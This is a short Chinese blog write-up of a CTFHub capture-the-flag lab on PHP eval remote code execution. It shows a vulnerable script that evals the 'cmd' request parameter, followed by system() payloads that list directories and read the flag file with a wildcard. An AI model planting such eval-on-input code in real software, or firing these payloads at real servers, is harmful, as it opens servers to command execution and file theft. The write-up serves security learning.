CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
Fantasydg12 小时前
AJAX JSON学习
前端·学习·ajax
越努力越幸运50813 小时前
AJAX 学习第一天:axios、HTTP 基础、serialize 插件
学习·http·ajax
im_AMBER13 小时前
HTTP 02 会话 | 消息 | MIME类型
网络·笔记·网络协议·学习·http
lijun_xiao200913 小时前
Apache Hadoop-学习笔记1
hadoop·学习·apache
q***728713 小时前
Golang 构建学习
开发语言·学习·golang
蓝桉~MLGT13 小时前
Python学习历程——文件
python·学习·策略模式
循环过三天13 小时前
7.5、Python-匿名函数lambda
笔记·python·学习
大大水瓶14 小时前
Nginx学习
学习·nginx·dubbo
jiushun_suanli14 小时前
FPGA(现场可编程门阵列)详解
经验分享·学习·fpga开发
虫洞没有虫16 小时前
Go语言学习笔记(二)
笔记·学习
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03BongoCat - 跨平台键盘猫动画工具04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05Linux下V2Ray安装配置指南06jdk21下载、安装(Windows、Linux、macOS)07智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践08使用国内镜像网站在线下载安装Qt(解决官网慢的问题)——Qt092025 最新教程:注册并切换到美区 Apple ID10Labelme从安装到标注:零基础完整指南